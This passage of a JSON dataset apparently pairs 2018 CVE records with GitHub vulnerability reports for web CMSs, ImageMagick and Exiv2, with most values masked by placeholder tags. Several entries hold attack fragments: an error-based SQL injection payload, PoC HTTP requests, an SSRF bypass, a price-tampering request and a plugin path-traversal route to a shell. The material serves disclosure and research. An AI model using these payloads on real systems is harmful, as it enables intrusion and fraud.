  23992. "Issue_Created_At": "2018-08-06T04:43:10Z",
  23993. "description": "wuzhicms NUMBERTAG sql injection vulnerability. > A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the APITAG filename APITAG code ERRORTAG POC APITAG APITAG",
  23994. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23995. "severity": "CRITICAL",
  23996. "baseScore": 9.8,
  23997. "impactScore": 5.9,
  23998. "exploitabilityScore": 3.9
  23999. },
  24000. {
  24001. "CVE_ID": "CVE-2018-15894",
  24002. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/150",
  24003. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/150",
  24004. "Repo_new": "wuzhicms/wuzhicms",
  24005. "Issue_Created_At": "2018-08-07T14:00:48Z",
  24006. "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. > A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the APITAG filename APITAG poc CODETAG CODETAG APITAG",
  24007. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24008. "severity": "CRITICAL",
  24009. "baseScore": 9.8,
  24010. "impactScore": 5.9,
  24011. "exploitabilityScore": 3.9
  24012. },
  24013. {
  24014. "CVE_ID": "CVE-2018-15895",
  24015. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/40",
  24016. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/40",
  24017. "Repo_new": "idreamsoft/iCMS",
  24018. "Issue_Created_At": "2018-08-18T19:06:28Z",
  24019. "description": "iCMS NUMBERTAG Has A SSRF vulnerability. >A SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive information. via the APITAG Notice This vulnerability is used in the right way APITAG of loophole repair is bypassed, or the flaw caused by imperfect repair. cause of loopholes APITAG following is the repair code of APITAG . In the code, the URL is judged by the intranet IP before request. APITAG NUMBERTAG Bypass the idea Through the custom domain name, specify the parsed A record as the intranet IP APITAG bypassing the URL detection of the program. APITAG POC APITAG APITAG APITAG APITAG",
  24020. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  24021. "severity": "HIGH",
  24022. "baseScore": 7.5,
  24023. "impactScore": 3.6,
  24024. "exploitabilityScore": 3.9
  24025. },
  24026. {
  24027. "CVE_ID": "CVE-2018-15899",
  24028. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/21",
  24029. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/21",
  24030. "Repo_new": "bg5sbk/minicms",
  24031. "Issue_Created_At": "2018-08-24T07:36:08Z",
  24032. "description": "APITAG has a XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG Vulnerability trigger point: PATHTAG poc: URLTAG \"> APITAG APITAG APITAG APITAG",
  24033. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24034. "severity": "MEDIUM",
  24035. "baseScore": 6.1,
  24036. "impactScore": 2.7,
  24037. "exploitabilityScore": 2.8
  24038. },
  24039. {
  24040. "CVE_ID": "CVE-2018-15917",
  24041. "Issue_Url_old": "https://github.com/bbalet/jorani/issues/254",
  24042. "Issue_Url_new": "https://github.com/bbalet/jorani/issues/254",
  24043. "Repo_new": "bbalet/jorani",
  24044. "Issue_Created_At": "2018-08-02T20:28:32Z",
  24045. "description": "Multiple Vulnerabilities. Hi, The last version NUMBERTAG has multiple critical vulnerabilities, please contact me to solve it. Thank you!",
  24046. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24047. "severity": "MEDIUM",
  24048. "baseScore": 5.4,
  24049. "impactScore": 2.7,
  24050. "exploitabilityScore": 2.3
  24051. },
  24052. {
  24053. "CVE_ID": "CVE-2018-16131",
  24054. "Issue_Url_old": "https://github.com/akka/akka-http/issues/2137",
  24055. "Issue_Url_new": "https://github.com/akka/akka-http/issues/2137",
  24056. "Repo_new": "akka/akka-http",
  24057. "Issue_Created_At": "2018-08-06T09:26:09Z",
  24058. "description": "APITAG does not respect APITAG When using FILETAG to handle APITAG any FILETAG applies to the compressed size, not the uncompressed size. This might facilitate APITAG attacks. The reason might be that APITAG uses APITAG which creates a new APITAG that is not limitable.",
  24059. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  24060. "severity": "HIGH",
  24061. "baseScore": 7.5,
  24062. "impactScore": 3.6,
  24063. "exploitabilityScore": 3.9
  24064. },
  24065. {
  24066. "CVE_ID": "CVE-2018-16157",
  24067. "Issue_Url_old": "https://github.com/caokang/waimai/issues/5",
  24068. "Issue_Url_new": "https://github.com/caokang/waimai/issues/5",
  24069. "Repo_new": "caokang/waimai",
  24070. "Issue_Created_At": "2018-08-29T21:50:18Z",
  24071. "description": "There is a Business logic vulnerability that can change the payment price.. First we have selected seven items. The price is NUMBERTAG FILETAG Then we can get the request package. FILETAG We changed the value of the parameter item_totals to NUMBERTAG FILETAG So we can get free products like this. FILETAG",
  24072. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  24073. "severity": "MEDIUM",
  24074. "baseScore": 5.3,
  24075. "impactScore": 1.4,
  24076. "exploitabilityScore": 3.9
  24077. },
  24078. {
  24079. "CVE_ID": "CVE-2018-16233",
  24080. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/22",
  24081. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/22",
  24082. "Repo_new": "bg5sbk/minicms",
  24083. "Issue_Created_At": "2018-08-30T08:06:13Z",
  24084. "description": "APITAG NUMBERTAG has XSS in the FILETAG . APITAG NUMBERTAG has XSS in the FILETAG via tags parameter Affected Version : APITAG NUMBERTAG Affected URL: PATHTAG POC: POST PATHTAG HTTP NUMBERTAG Host: User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG APITAG APITAG rcc_accepted NUMBERTAG sidenav_treesearch=; APITAG APITAG APITAG icms[device_type]=desktop; APITAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  24085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24086. "severity": "MEDIUM",
  24087. "baseScore": 6.1,
  24088. "impactScore": 2.7,
  24089. "exploitabilityScore": 2.8
  24090. },
  24091. {
  24092. "CVE_ID": "CVE-2018-16234",
  24093. "Issue_Url_old": "https://github.com/urbanadventurer/WhatWeb/issues/261",
  24094. "Issue_Url_new": "https://github.com/urbanadventurer/whatweb/issues/261",
  24095. "Repo_new": "urbanadventurer/whatweb",
  24096. "Issue_Created_At": "2018-08-27T00:58:48Z",
  24097. "description": "Security Issue: Stored XSS. When I used APITAG to scan a target and use APITAG option, stored XSS may occur. The target just like this: APITAG I used APITAG with APITAG NUMBERTAG APITAG And the result: ERRORTAG When I use Windows7 with IE7 open the result, XSS has been triggered. APITAG Suggestion: Use url encode for the output url. APITAG will be convert to APITAG . Discovered by EMAILTAG",
  24098. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24099. "severity": "MEDIUM",
  24100. "baseScore": 6.1,
  24101. "impactScore": 2.7,
  24102. "exploitabilityScore": 2.8
  24103. },
  24104. {
  24105. "CVE_ID": "CVE-2018-16237",
  24106. "Issue_Url_old": "https://github.com/howchen/howchen/issues/2",
  24107. "Issue_Url_new": "https://github.com/howchen/howchen/issues/2",
  24108. "Repo_new": "howchen/howchen",
  24109. "Issue_Created_At": "2018-08-29T07:35:30Z",
  24110. "description": "Get a APITAG admin permission by Force authentication. PART NUMBERTAG get the admin authenticaton Here is a default APITAG admin user's cookie: CODETAG the APITAG would be updated when admin logins in, \" APITAG \" is a COOKIE_PREFIX by default NUMBERTAG comes from APITAG function in php, the cookie is valided for NUMBERTAG hours\uff0c it means we can get the admin permission just by Enumerating maximum NUMBERTAG times if the admin logged In NUMBERTAG get a string by APITAG function FILETAG APITAG NUMBERTAG crafted a request CODETAG NUMBERTAG Send to intruder,\uff0cconfiguraton the Positions and Payloads e.g. APITAG PART NUMBERTAG Remote Code Execution when logined as a admin (By part1\uff09, There is a Remote Code Execution vulnerability NUMBERTAG edit and update the file with the code APITAG PATHTAG ERRORTAG NUMBERTAG isite the url below URLTAG PART NUMBERTAG Directory Traversal when logined as a admin (By part1\uff09, There is a Directory Traversal vulnerability read the content of PATHTAG CODETAG",
  24111. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  24112. "severity": "LOW",
  24113. "baseScore": 2.7,
  24114. "impactScore": 1.4,
  24115. "exploitabilityScore": 1.2
  24116. },
  24117. {
  24118. "CVE_ID": "CVE-2018-16248",
  24119. "Issue_Url_old": "https://github.com/b3log/solo/issues/12489",
  24120. "Issue_Url_new": "https://github.com/b3log/solo/issues/12489",
  24121. "Repo_new": "b3log/solo",
  24122. "Issue_Created_At": "2018-08-27T02:38:47Z",
  24123. "description": "A persistent XSS was found.. Hey, the wonderful work of personal blog! I find the security problems on the website: A cross site scripting (XSS) vulnerability found in the Input page under the APITAG Articles\" menu in b3log NUMBERTAG with an ID of APITAG stored in the \"tag\" JSON field allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name via a APITAG authenticated HTTP request. playload\uff1a APITAG alert NUMBERTAG APITAG POC\uff1a PUT PATHTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG Connection: close APITAG ]( URLTAG \u6b22\u8fce\u4f7f\u7528 APITAG URLTAG APITAG \u53e6\u5916\uff0c\u6b22\u8fce\u4f60\u52a0\u5165 FILETAG \uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u535a\u5ba2\u8d26\u53f7\u76f4\u63a5\u767b\u5f55\uff01 Solo \u535a\u5ba2\u7cfb\u7edf\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u5982\u679c\u4f60\u89c9\u5f97\u5b83\u5f88\u8d5e\uff0c\u8bf7\u5230 \u9879\u76ee\u9996\u9875 URLTAG \u7ed9\u9897\u661f\u9f13\u52b1\u4e00\u4e0b APITAG ]( URLTAG \u6b22\u8fce\u4f7f\u7528 APITAG URLTAG APITAG \u53e6\u5916\uff0c\u6b22\u8fce\u4f60\u52a0\u5165 FILETAG \uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528\u535a\u5ba2\u8d26\u53f7\u76f4\u63a5\u767b\u5f55\uff01 Solo \u535a\u5ba2\u7cfb\u7edf\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u5982\u679c\u4f60\u89c9\u5f97\u5b83\u5f88\u8d5e\uff0c\u8bf7\u5230 \u9879\u76ee\u9996\u9875 URLTAG \u7ed9\u9897\u661f\u9f13\u52b1\u4e00\u4e0b APITAG APITAG APITAG APITAG Markdown\"}} This is a packet that contains \"payload\" submitted. Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG FILETAG FILETAG Multiple locations are executing script code, including the front page of blog. If the data is not sanitized upon input, these components are going to return arbitrary web script or HTML that can be rendered by the browser .",
  24124. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24125. "severity": "MEDIUM",
  24126. "baseScore": 6.1,
  24127. "impactScore": 2.7,
  24128. "exploitabilityScore": 2.8
  24129. },
  24130. {
  24131. "CVE_ID": "CVE-2018-16249",
  24132. "Issue_Url_old": "https://github.com/b3log/symphony/issues/729",
  24133. "Issue_Url_new": "https://github.com/b3log/symphony/issues/729",
  24134. "Repo_new": "b3log/symphony",
  24135. "Issue_Created_At": "2018-08-27T07:43:59Z",
  24136. "description": "There is a persistent XSS in the title of the post office. Hey, I found the security problems on the website: A cross site scripting (XSS) vulnerability found in APITAG under APITAG in Symphony NUMBERTAG the ID APITAG of which is stored in the APITAG JSON field, executes \"payload\" when accessing this address (\" URLTAG \"), allowing remote attacks Any Web script or HTML can be inserted into the APITAG authen through a well written web site name. Verified HTTP request. playload\uff1a APITAG alert NUMBERTAG APITAG POC: PUT /article NUMBERTAG HTTP NUMBERTAG Host: localhost NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG APITAG APITAG X Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG b3log APITAG Connection: close APITAG APITAG APITAG APITAG This is a packet that contains \"payload\" submitted. FILETAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. APITAG is executed. The following is the output of the payload mentioned in the input and save. The.Ip address is URLTAG FILETAG",
  24137. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24138. "severity": "MEDIUM",
  24139. "baseScore": 4.8,
  24140. "impactScore": 2.7,
  24141. "exploitabilityScore": 1.7
  24142. },
  24143. {
  24144. "CVE_ID": "CVE-2018-16250",
  24145. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/156",
  24146. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/156",
  24147. "Repo_new": "creatiwity/witycms",
  24148. "Issue_Created_At": "2018-08-29T08:41:37Z",
  24149. "description": "Persistent XSS. The \"utilisateur\" menu on the APITAG NUMBERTAG site modifies the presence of XSS at two input points for user information, with the parameters \"first name\" and \"last name\". payload: \" APITAG \" APITAG Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG Payload data are submitted to PATHTAG FILETAG When users want to change their names, clicking the input box triggers the code. FILETAG FILETAG FILETAG",
  24150. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24151. "severity": "MEDIUM",
  24152. "baseScore": 5.4,
  24153. "impactScore": 2.7,
  24154. "exploitabilityScore": 2.3
  24155. },
  24156. {
  24157. "CVE_ID": "CVE-2018-16251",
  24158. "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/157",
  24159. "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/157",
  24160. "Repo_new": "creatiwity/witycms",
  24161. "Issue_Created_At": "2018-08-29T09:47:35Z",
  24162. "description": "Find a SQL injection. Search for user discovery injection under the witycms NUMBERTAG APITAG menu. No input parameters were filtered. PATHTAG APITAG payload: firstname=' AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG a NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG lastname=' AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG a NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG Defective pages and addresses FILETAG URLTAG Attack through sqlmap, find database name and database type. FILETAG FILETAG A page executed by background code. FILETAG PATHTAG",
  24163. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  24164. "severity": "MEDIUM",
  24165. "baseScore": 4.3,
  24166. "impactScore": 1.4,
  24167. "exploitabilityScore": 2.8
  24168. },
  24169. {
  24170. "CVE_ID": "CVE-2018-16278",
  24171. "Issue_Url_old": "https://github.com/howchen/howchen/issues/3",
  24172. "Issue_Url_new": "https://github.com/howchen/howchen/issues/3",
  24173. "Repo_new": "howchen/howchen",
  24174. "Issue_Created_At": "2018-08-31T08:29:53Z",
  24175. "description": "APITAG sql injection via dir parameter. FILETAG CODETAG execute the commands below: APITAG",
  24176. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24177. "severity": "CRITICAL",
  24178. "baseScore": 9.8,
  24179. "impactScore": 5.9,
  24180. "exploitabilityScore": 3.9
  24181. },
  24182. {
  24183. "CVE_ID": "CVE-2018-16283",
  24184. "Issue_Url_old": "https://github.com/springjk/wordpress-wechat-broadcast/issues/14",
  24185. "Issue_Url_new": "https://github.com/springjk/wordpress-wechat-broadcast/issues/14",
  24186. "Repo_new": "springjk/wordpress-wechat-broadcast",
  24187. "Issue_Created_At": "2018-08-31T16:51:55Z",
  24188. "description": "Vulnerability Local File Inclusion. This bug was found using the portal in the files: PATHTAG echo APITAG ? $_GET[\"url\"] : ''); The parameter \"url\" it is not sanitized allowing include local or remote files",
  24189. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24190. "severity": "CRITICAL",
  24191. "baseScore": 9.8,
  24192. "impactScore": 5.9,
  24193. "exploitabilityScore": 3.9
  24194. },
  24195. {
  24196. "CVE_ID": "CVE-2018-16298",
  24197. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/23",
  24198. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/23",
  24199. "Repo_new": "bg5sbk/minicms",
  24200. "Issue_Created_At": "2018-08-31T06:54:34Z",
  24201. "description": "APITAG NUMBERTAG has Another XSS in the FILETAG . APITAG NUMBERTAG has XSS in the FILETAG while state=delete, draft, publish via tag parameter. Affected Version : APITAG NUMBERTAG Affected URL: PATHTAG NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG GET PATHTAG NUMBERTAG GET PATHTAG",
  24202. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24203. "severity": "MEDIUM",
  24204. "baseScore": 6.1,
  24205. "impactScore": 2.7,
  24206. "exploitabilityScore": 2.8
  24207. },
  24208. {
  24209. "CVE_ID": "CVE-2018-16299",
  24210. "Issue_Url_old": "https://github.com/julianburr/wp-plugin-localizemypost/issues/1",
  24211. "Issue_Url_new": "https://github.com/julianburr/wp-plugin-localizemypost/issues/1",
  24212. "Repo_new": "julianburr/wp-plugin-localizemypost",
  24213. "Issue_Created_At": "2018-08-31T22:48:13Z",
  24214. "description": "Localize My Post Wordpress Vulnerability. Hello, There are a vulnerability on this plugin, I send you an email from EMAILTAG",
  24215. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  24216. "severity": "HIGH",
  24217. "baseScore": 7.5,
  24218. "impactScore": 3.6,
  24219. "exploitabilityScore": 3.9
  24220. },
  24221. {
  24222. "CVE_ID": "CVE-2018-16314",
  24223. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/35",
  24224. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/35",
  24225. "Repo_new": "idreamsoft/iCMS",
  24226. "Issue_Created_At": "2018-08-10T07:32:12Z",
  24227. "description": "Admincp.php has a CSRF. When verifying CSRF_TOKEN, if CSRF_TOKEN does not exist, only refere information is validated, which can be bypassed by path masking. PAYLOAD APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Put the HTML file in the camouflaged refere PATHTAG Submit data packets, refere information is\uff1a Referer: FILETAG You can bypass refere validation FILETAG",
  24228. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24229. "severity": "HIGH",
  24230. "baseScore": 8.8,
  24231. "impactScore": 5.9,
  24232. "exploitabilityScore": 2.8
  24233. },
  24234. {
  24235. "CVE_ID": "CVE-2018-16315",
  24236. "Issue_Url_old": "https://github.com/caokang/waimai/issues/3",
  24237. "Issue_Url_new": "https://github.com/caokang/waimai/issues/3",
  24238. "Repo_new": "caokang/waimai",
  24239. "Issue_Created_At": "2018-08-02T02:40:12Z",
  24240. "description": "There is a CSRF vulnerability that can change the information of shop. After the administrator logged in, open the following the page poc\uff1a FILETAG //change the information of shop APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  24241. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24242. "severity": "MEDIUM",
  24243. "baseScore": 6.5,
  24244. "impactScore": 3.6,
  24245. "exploitabilityScore": 2.8
  24246. },
  24247. {
  24248. "CVE_ID": "CVE-2018-16320",
  24249. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/41",
  24250. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/41",
  24251. "Repo_new": "idreamsoft/iCMS",
  24252. "Issue_Created_At": "2018-08-27T03:43:37Z",
  24253. "description": "Get shell by upload and install plugin.. Exploit Step APITAG the upload directory. APITAG the zip file which contain the exploit APITAG can download from the plugin store. APITAG the zip APITAG the install button and modify the request package as show below. APITAG the page which create by the evil zip file. FILETAG FILETAG FILETAG FILETAG FILETAG Suggetion : Never allow user to modify the path with \u2018../\u2018. I am requesting a cve id.I need your APITAG for your reading.",
  24254. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  24255. "severity": "HIGH",
  24256. "baseScore": 7.2,
  24257. "impactScore": 5.9,
  24258. "exploitabilityScore": 1.2
  24259. },
  24260. {
  24261. "CVE_ID": "CVE-2018-16325",
  24262. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1284",
  24263. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1284",
  24264. "Repo_new": "getsimplecms/getsimplecms",
  24265. "Issue_Created_At": "2018-07-12T04:03:56Z",
  24266. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in uploadify flash file might allow remote attackers to inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG create new page url: FILETAG title input payload APITAG FILETAG NUMBERTAG clike the link FILETAG NUMBERTAG ss cookie FILETAG FILETAG Release Info NUMBERTAG author by xijun. EMAILTAG .cn",
  24267. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24268. "severity": "MEDIUM",
  24269. "baseScore": 6.1,
  24270. "impactScore": 2.7,
  24271. "exploitabilityScore": 2.8
  24272. },
  24273. {
  24274. "CVE_ID": "CVE-2018-16327",
  24275. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/771",
  24276. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/771",
  24277. "Repo_new": "intelliants/subrion",
  24278. "Issue_Created_At": "2018-07-31T03:47:39Z",
  24279. "description": "Validate admin panel URL config. Please add some rules for this config field as currently it can even store XSS payloads like ERRORTAG",
  24280. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  24281. "severity": "MEDIUM",
  24282. "baseScore": 4.8,
  24283. "impactScore": 2.7,
  24284. "exploitabilityScore": 1.7
  24285. },
  24286. {
  24287. "CVE_ID": "CVE-2018-16328",
  24288. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1224",
  24289. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1224",
  24290. "Repo_new": "imagemagick/imagemagick",
  24291. "Issue_Created_At": "2018-07-23T14:19:53Z",
  24292. "description": "A null pointer dereferene in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description In PATHTAG we can see a function APITAG APITAG , then the code use p >event_mask in the line NUMBERTAG but don't check the point p. In the function APITAG it will return NULL point if APITAG . In PATHTAG we can see the code check the value of option, but in PATHTAG we don't have this check.",
  24293. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24294. "severity": "CRITICAL",
  24295. "baseScore": 9.8,
  24296. "impactScore": 5.9,
  24297. "exploitabilityScore": 3.9
  24298. },
  24299. {
  24300. "CVE_ID": "CVE-2018-16329",
  24301. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1225",
  24302. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1225",
  24303. "Repo_new": "imagemagick/imagemagick",
  24304. "Issue_Created_At": "2018-07-23T14:38:58Z",
  24305. "description": "A null pointer dereferene might happend in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description In PATHTAG the code has a assert to see whether image is null APITAG , but the condition still to be true if image_info is not null. And then in line NUMBERTAG comparing \"image\" to null implies that \"image\" might be null. The code don't do anything and it might to be a null pointer dereferene in switch case code like APITAG",
  24306. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24307. "severity": "CRITICAL",
  24308. "baseScore": 9.8,
  24309. "impactScore": 5.9,
  24310. "exploitabilityScore": 3.9
  24311. },
  24312. {
  24313. "CVE_ID": "CVE-2018-16330",
  24314. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/612",
  24315. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/612",
  24316. "Repo_new": "pandao/editor.md",
  24317. "Issue_Created_At": "2018-08-16T06:45:07Z",
  24318. "description": "This editor is not fully filtered, causing XSS vulnerabilities. when We enter some strings,such as: APITAG APITAG '\"> The editor will execute XSS payload APITAG When some cms use this editor, it is easy to get administrator rights by using XSS attack.",
  24319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  24320. "severity": "MEDIUM",
  24321. "baseScore": 6.1,
  24322. "impactScore": 2.7,
  24323. "exploitabilityScore": 2.8
  24324. },
  24325. {
  24326. "CVE_ID": "CVE-2018-16332",
  24327. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/31",
  24328. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/31",
  24329. "Repo_new": "idreamsoft/iCMS",
  24330. "Issue_Created_At": "2018-07-26T09:32:42Z",
  24331. "description": "There is a CSRF vulnerability that admin can pass any person's article in iCMS NUMBERTAG Firstly any user write an article and publish,then find the article ID in MY ARTICLE menu. When admin click this URL,article will be passed. URL : URLTAG We can hide this URL poc : FILETAG APITAG id NUMBERTAG is the article ID.",
  24332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24333. "severity": "HIGH",
  24334. "baseScore": 8.8,
  24335. "impactScore": 5.9,
  24336. "exploitabilityScore": 2.8
  24337. },
  24338. {
  24339. "CVE_ID": "CVE-2018-16336",
  24340. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/400",
  24341. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/400",
  24342. "Repo_new": "exiv2/exiv2",
  24343. "Issue_Created_At": "2018-08-14T02:17:50Z",
  24344. "description": "APITAG NUMBERTAG heap buffer overflow problems ( APITAG && bool APITAG APITAG char >(unsigned char )). Following bugs was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG ) both tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master ce NUMBERTAG ed NUMBERTAG exi NUMBERTAG POC POC1 URLTAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG fa NUMBERTAG bp NUMBERTAG fff NUMBERTAG f NUMBERTAG d0 sp NUMBERTAG fff NUMBERTAG f NUMBERTAG c0 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG fa NUMBERTAG in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG e7 in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG ee8dc1 in APITAG ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG d3b in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG d7 in main ( PATHTAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG de8 in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG e NUMBERTAG b2 in operator APITAG long) ( 